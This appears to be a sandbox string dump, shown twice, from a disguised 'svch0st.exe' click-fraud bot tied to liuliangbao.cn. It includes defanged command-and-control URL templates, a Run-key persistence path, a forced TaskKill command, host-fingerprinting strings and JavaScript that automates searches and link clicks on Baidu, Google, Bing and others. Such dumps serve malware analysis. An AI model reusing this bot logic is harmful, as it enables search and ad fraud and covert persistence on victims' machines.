Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_2080_rwx_00081000_00110000:

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

function IsSearchInput(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='text'&&id=='kw';else if(target.indexOf('soso')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('sogou')>0)return type=='text'&&(id=='query'||id=='upquery')&&name=='query';else if(target.indexOf('google')>0)return type=='text'&&id=='lst-ib'&&name=='q';else if(target.indexOf('youdao')>0)return type=='text'&&id=='query'&&name=='q';else if(target.indexOf('bing')>0)return id=='sb_form_q'&&name=='q';else if(target.indexOf('yahoo')>0)return type=='text'&&(id=='ysearchq'||id=='qtop')&&name=='q';else if(target.indexOf('haosou')>0)return type=='text'&&name=='q'}

127.0.0.1

192.168.255.255

192.168.0.0

172.31.255.255

172.16.0.0

10.255.255.255

10.0.0.0

bl.dat

.tmall.

.taobao.

blhash.dat

%s%s%s

%s%s:%d%s

hXXps://

http:

shlwapi.dll

openurl

ddd

rq=%d&ss=%dx%d&t=%d&ttl=%d&wid=%d&locale=%s

{%d~}_

{%d_%d}_

{%d}_

onkeydown

mscoree.dll

KERNEL32.DLL

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

WUSER32.DLL

ddd

ntdll.dll

%d.%d.%d

%s(ActiveCore:%d)

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003

Microsoft Windows XP Professional x64 Edition

Microsoft Windows 8.1

Microsoft Windows Server 2012 R2

Microsoft Windows 8

Microsoft Windows Server 2008 R2

Microsoft Windows 7

Microsoft Windows Server 2008

Microsoft Windows Vista

Microsoft Windows 10

%s@%s (v%s-%s) || Hardware:{CPU:%s,Memory:%s}|| BrowserAgent : %s || Openner : %s || InnerIP : %s || PeerSoftware : %s

Request send failed. Err code:%d

set cookie:%s

GetResponse data is : %s

::HttpSendRequest To %s failed------>>>>! Error code is %d

Internet handle(%d) post data is : %s

HttpSession's request has Completed! StatusCode is %d

Post data thread start ! Internet handle is : %d

Content-Type: application/x-www-form-urlencoded

cannot open request!! Error code is %d

HTTP/1.1

cannot open Internet!! Error code is %d

Send request thread start ! target is : %s

llb/%s

TerminateProcess Failed . ErrorCode is %d

TaskKill /pid %d /f

::HttpSendRequest function failed------>>>>!

%s at offset %d unterminated

Incorrect %s at offset %d

%s%d bytes to %d wide chars

%d wide chars to %s%d bytes

Element '%s' at offset %d not ended

End tag '%s' at offset %d does not match start tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

%s#%d

\Process(%s)\

AlexaToolbar.10.0.dll

kernel32.dll

NTDLL.dll

C:\Windows\system32\svch0st.exe

svch0st.exe_2080_rwx_00193000_00001000:

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHELL32.dll

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

RegCloseKey

CertOpenStore

SHDeleteKeyW

liuliangbao_A9B8CC67.exe

TFExecuter4

VVV.microsoft.com

1.1.73.813

svch0st.exe_2080_rwx_6B1EB000_00001000:

Fv=kAv.SCv

svch0st.exe_2080_rwx_6E951000_00001000:

zFw.AEw

CLSID\%s\InProcServer32

VID_X&PID_X

%s\%s

Joystick%dOEMName

GAMEPORT\VID_045E&PID_010C

GAMEPORT\VID_045E&PID_010B

GAMEPORT\VID_045E&PID_010A

GAMEPORT\VID_045E&PID_0109

GAMEPORT\VID_045E&PID_0108

GAMEPORT\VID_045E&PID_0107

GAMEPORT\VID_045E&PID_0106

GAMEPORT\VID_045E&PID_0105

GAMEPORT\VID_045E&PID_0104

GAMEPORT\VID_045E&PID_0103

GAMEPORT\VID_045E&PID_0102

JoystickßFConfiguration

JoystickÜonfiguration

svch0st.exe_2080_rwx_6E981000_00001000:

d:\w7rtm\base\diagnosis\pdi\pdh\pdhdll\query.c

d:\w7rtm\base\diagnosis\pdi\pdh\pdhlog\log.c

SOFTWARE\Microsoft\Windows NT\CurrentVersion\PDH

svch0st.exe_2080_rwx_6F9D1000_00001000:

Ew.AEw

RCv=kAv.SCvs

KERNELBASE.DLL

svch0st.exe_3188:

`.rsrc

xSSSh

FTPjKS

FtPj;S

C.PjRV

28^%u

>8_%u

Bv.SCv"

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

FRegDeleteKeyExW

crash.desc

urls

maxExeTime

CURLDetector

NtQueryValueKey

NtOpenKeyEx

CertOpenStore

CommitUrlCacheEntryA

CommitUrlCacheEntryW

TaskDialogIndirect

Comdlg32.dll

Kernel32.dll

Shell32.dll

Gdi32.dll

DSound.dll

dfdll.dll

Credui.dll

User32.dll

Crypt32.dll

Wintrust.dll

Wininet.dll

Comctl32.dll

Winmm.dll

SHELL32.dll

NTDLL.DLL

Shell32.dll

HTTP_STATUS_VERSION_NOT_SUP

HTTP_STATUS_GATEWAY_TIMEOUT

HTTP_STATUS_SERVICE_UNAVAIL

HTTP_STATUS_BAD_GATEWAY

HTTP_STATUS_NOT_SUPPORTED

HTTP_STATUS_SERVER_ERROR

HTTP_STATUS_RETRY_WITH

HTTP_STATUS_UNSUPPORTED_MEDIA

HTTP_STATUS_URI_TOO_LONG

HTTP_STATUS_REQUEST_TOO_LARGE

HTTP_STATUS_PRECOND_FAILED

HTTP_STATUS_LENGTH_REQUIRED

HTTP_STATUS_GONE

HTTP_STATUS_CONFLICT

HTTP_STATUS_REQUEST_TIMEOUT

HTTP_STATUS_PROXY_AUTH_REQ

HTTP_STATUS_NONE_ACCEPTABLE

HTTP_STATUS_BAD_METHOD

HTTP_STATUS_NOT_FOUND

HTTP_STATUS_FORBIDDEN

HTTP_STATUS_PAYMENT_REQ

HTTP_STATUS_DENIED

HTTP_STATUS_BAD_REQUEST

INET_E_INVALID_CERTIFICATE

INET_E_INVALID_URL

Visual C   CRT: Not enough memory to complete call to strerror.

portuguese-brazilian

Broken pipe

Inappropriate I/O control operation

Operation not permitted

operator

GetProcessWindowStation

1.2.8

-_.!~*'():

inflate 1.2.8 Copyright 1995-2013 Mark Adler

.?AVIHttpSession@@

.?AVITaskReporter@@

.?AUIExecutorInfo@@

.?AV?$sp_counted_impl_p@VFeedbackReporter@@@detail@boost@@

.?AV?$ObservableAsync@VFeedbackReporter@@@@

.?AV?$enable_shared_from_this@VFeedbackReporter@@@boost@@

.?AVFeedbackReporter@@

.?AVIHttpProxyInfo@@

.?AVIHttpConfigurator@@

.?AV?$sp_counted_impl_p@VKClientInnerProcessor@CTFExecuterDlg@@@detail@boost@@

.?AVKClientInnerProcessor@CTFExecuterDlg@@

.?AVCTFExecuterDlg@@

.?AV?$CAxDialogImpl@VCTFExecuterDlg@@VCWindow@ATL@@@ATL@@

.?AVInternetProtocolSinkTM@PassthroughAPP@@

.?AVIInternetProtocolSinkImpl@PassthroughAPP@@

.?AV?$InternetProtocolSinkWithSP@VFilterSink@@@PassthroughAPP@@

.?AUIHttpNegotiate@@

.?AV?$CComObjectSharedRef@VFilterSink@@@PassthroughAPP@@

.?AV?$InternetProtocolFilter@V?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@@PassthroughAPP@@

.?AVIInternetProtocolImpl@PassthroughAPP@@

.?AUIWinInetHttpInfo@@

.?AV?$CustomSinkFilter@VFilterSink@@@PassthroughAPP@@

.?AV?$Singleton@VCURLDetector@@@@

.?AVCURLDetector@@

.?AV?$IDispatchImpl@UIATLBrowserHost@@$1?IID_IATLBrowserHost@@3U_GUID@@B$1?LIBID_TFExecuter4Lib@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@

.?AVAlxLocalExecuter@@

.?AVCExecuterEngine@@

.?AV?$IDispEventImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$00VCComTypeInfoHolder@ATL@@@ATL@@

.?AV?$IDispEventSimpleImpl@$0GG@VCHostATLHtmCtrl@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AV?$_IDispEventLocator@$0GG@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@

.?AVCExecuterFlash@@

.?AVCExecuterEarn@@

.?AVCExecuterFlowBase@@

.?AVCExecuterKWConfig@@

.?AVCExecuterKWBase@@

.?AVCExecuterFlow@@

.?AVCExecuterPage@@

.?AVCExecuterPopup@@

zcÁ

.?AV?$sp_counted_impl_p@VHttpSession@@@detail@boost@@

.?AV?$ObservableSync@VHttpSession@@@@

.?AV?$enable_shared_from_this@VHttpSession@@@boost@@

.?AVThreadID2Request@HttpSession@@

.?AVThreadID2Param@?$AsyncFunctionCaller@VRequestInfo@HttpSession@@V12@@@

.?AVHttpSession@@

WinExec

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegCloseKey

RegOpenKeyW

RegOpenKeyExW

RegDeleteKeyW

RegQueryInfoKeyW

RegEnumKeyExW

SHDeleteKeyW

UrlMkSetSessionOption

EnumChildWindows

SetWindowsHookExW

UnhookWindowsHookEx

CreateDialogIndirectParamW

HttpQueryInfoW

HttpSendRequestW

InternetCanonicalizeUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpAddRequestHeadersW

(>>>>?@@@

-& #>>##9#-&

% 35:1%S^/@0

yRN.Rx&N*3E03

i( LFaO.E.IX2jR.R]h)8R6_S])0J>Rs;@

-8000?.0

F^H0(;%3S5%

.text

`.rdata

@.data

.rsrc

@.reloc

35:1%S^/@0

yRN.Rx&N*3E

LFaO.E.IX2jR8]h)8

.MD{#

KERNEL32.DLL

ADVAPI32.dll

COMDLG32.dll

CRYPT32.dll

dbghelp.dll

DSOUND.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

pdh.dll

PSAPI.DLL

SHLWAPI.dll

urlmon.dll

USER32.dll

VERSION.dll

WININET.dll

WINMM.dll

WINTRUST.dll

WS2_32.dll

%s\%s\%s

cfg.ini

%s%sSCConfig.dat

%s\%s

Software\Microsoft\Windows\CurrentVersion\Run

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

log.txt

6.%s.%d.5

6.%s.%d.%d

r%s=%s

HKEY_PERFORMANCE_NLSTEXT

HKEY_PERFORMANCE_TEXT

ThreadID(%d) %s :

ThreadID(%d)[%s] %s :

d-d-d d:d:d.d

%s_%s_%d

%d.%d.%d.%d

xxxxxxxxxxxxxxxx

can not start Blink core ! ExitCode is %d.

can not start Blink core ! ErrorCode is %d.

DeleteFolder %s

RemoteUpdater : %s

content_shell.exe

%s%s%s%s

%s\%s\

URLConfiguration.xml

Sync config data to server: %s

=%s&r

=%d&p

=%d&c

=%s&t

SaveCfg Response: %s

EncrypterKeyList

%s^%d^%d^

%s|%d

hXXp://%s/redirect/CFGUpdate?number=%s&checksum=%s&cid=%s&rd=%d

zipUrl

xml.dat

polyUrl

Trans response to string:%s

New process forbid : Tasktype limit (%d) overflow

New process forbid : Auto level max count((%d) overflow

New process forbid : Running max count(%d) overflow

New process forbid : CPU Max(%d) overflow

New task(PID: %d)Processed! Param is %s

Create task processed error! ErrorCode is %d.

Can not find Executor! (path : %s)

FetchTaskList : Trans response to string: %s

aws:UrlInfoResult

ProxyByPass

ProxyPassword

hXXp://%s/clt/jobid/%s

hid=%s&cid=%s&jid=%s

RequestType : %d.Trans response to string:%s

Translate HeartBeat Response to string:%s

i=%s&si=%s

To fetch backup server domain form : %s

URLConfig

Add new server domain %s

ap%d.%s

hXXp://img01.taobaocdn.com/imgextra/i1/58465055/T2EoRRXbJdXXXXXXXX_!!58465055.jpg

hXXp://img04.taobaocdn.com/imgextra/i4/58465055/T2SyJhXoRNXXXXXXXX_!!58465055.jpg

hXXp://img03.taobaocdn.com/imgextra/i3/58465055/T2BulKXdhcXXXXXXXX_!!58465055.jpg

hXXp://%s/ts/f4/

hXXp://%s/ts/f3.1/

hXXp://%s/ts/f2.2/

hXXp://%s/ts/f7/

hXXp://%s/as/c/f9/

hXXp://%s/as/c/f8/

hXXp://%s/as/c/f10.1/

hXXp://%s/as/2/h5/

hXXp://%s/as/2/h1/

hXXp://%s/as/2/h2/

hXXp://%s/as/c/f11/

hXXp://%s/as/2/h4/

hXXp://%s/as/2/h3/

hXXp://%s/as/c/f5/

hXXp://

Current count of task in taskContainer is %d

Render task's param is %s

ghXXp://VVV.baidu.com/

https

\index.dat

%s\Cookies\%d

type:%d,

shell.explorer

{0d43fe01-f093-11cf-8940-00a0c9054228}

{13709620-c279-11ce-a49e-444553540000}

{00000566-0000-0010-8000-00aa006d2ea4}

{093ff999-1ea0-4079-9525-9614c3504b74}

{72c24dd5-d70a-438b-8a42-98424b88afb8}

{6bf52a52-394a-11d3-b153-00c04f79faa6}

{2d360201-fff5-11d1-8d03-00a0c959bc0a}

{e05bc2a3-9a46-4a32-80c9-023a473f5b23}

XMLHTTP

1400:0;1406:3;1803:0;DisplayTrustAlertDlg:0;MaxHttpRedirects:10

bmp;rar;wma;wav;mp3;mp4;mid;midi;asf;exe;avi;dat;bat;iso;mpeg;mpg;mpga;ra;rar;dll;ogg;acc;ape;reg;rm;rmvb;tar;wma;wmp;wmv;mov;zip;3gp;chm;mdf;torrent;jar;msi;dmg;apk;crx;pdf;7z;mkv;doc;docx;xls;xlsx;ppt;pptx;mdb;xps

runtask.dat

liuliangbao.cn

sap1200.com

mshtml.dll

%s\%ld

lShell32.DLL

hXXp://%s:%d

hXXp://%s

.html

hXXp://%s/%d/

GetClickUrl

IsNextPageUrl

function GetClickUrl(target,match){if(target.indexOf('baidu')>0){var tables=document.getElementsByTagName('div');for(var i=0;i<tables.length;i  ){var table=tables[i];if(table.className.indexOf('c-container')!=-1){var a=table.getElementsByTagName('a')[0];var ele=null;var spans=table.getElementsByTagName('span');if(spans.length>0){ele=spans[0]}else{var fonts=table.getElementsByTagName('font');if(fonts.length>2){ele=fonts[2]}}if(ele){var text=ele.innerText.split(' ',2)[0];if(text.indexOf(match)!=-1){return a.href}}}}return''}else return null}

function DoMoreThing(target){if(target.indexOf('google')>0){var table=document.getElementsByTagName('div');for(var i=0;i<table.length;i  ){if(table[i].className=='gstl_0 sbdd_a'){table[i].style.display='none';}}}}

function IsNextPageUrl(target,url,anchor) { return anchor.indexOf('

')!=-1; }

function IsDisallowDomain(target,domain,path){if(target.indexOf('baidu')>0){if(domain.indexOf('cbjs.baidu')!=-1||domain.indexOf('cpro.baidu')!=-1||domain.indexOf('hm.baidu')!=-1)return true;return domain.indexOf('baidu')==-1&&domain.indexOf('bdstatic')==-1};else if(target.indexOf('soso')>0)return domain.indexOf('soso')==-1&&domain.indexOf('qstatic')==-1&&domain.indexOf('qq.com')==-1;else if(target.indexOf('sogou')>0)return domain.indexOf('sogou')==-1;else if(target.indexOf('google')>0)return domain.indexOf('google')==-1&&domain.indexOf('gstatic')==-1;else if(target.indexOf('youdao')>0)return domain.indexOf('youdao')==-1&&domain.indexOf('ydstatic')==-1;else if(target.indexOf('bing')>0)return domain.indexOf('bing')==-1||path.indexOf('hprichbg')!=-1;else if(target.indexOf('yahoo')>0)return domain.indexOf('yahoo')==-1&&domain.indexOf('yimg')==-1&&domain.indexOf('aliyun')==-1&&domain.indexOf('tanx')==-1&&domain.indexOf('limgs')==-1;else if(target.indexOf('haosou')>0)return domain.indexOf('360')==-1&&domain.indexOf('qhupdate')==-1&&domain.indexOf('qhimg')==-1&&domain.indexOf('haosou')==-1}

function IsSearchButton(target,type,name,id,clas){if(target.indexOf('baidu')>0)return type=='submit'&&id=='su';else if(target.indexOf('soso')>0)return type=='submit'&&(id=='stb'||clas=='s_button'||id=='searchHeaderSubmit');else if(target.indexOf('sogou')>0)return type=='submit'&&(id=='stb'||id=='searchBtn');else if(target.indexOf('google')>0){if(target.indexOf('#0#')>0)return type=='submit'&&name=='btnK';else return type=='submit'&&name=='btnG'}else if(target.indexOf('youdao')>0)return type=='submit'&&(id=='qb'||clas=='s-btn');else if(target.indexOf('bing')>0)return type=='submit'&&id=='sb_form_go';else if(target.indexOf('yahoo')>0)return type=='submit';else if(target.indexOf('haosou')>0)return type=='submit'&&(id=='search-button'||id=='su')}

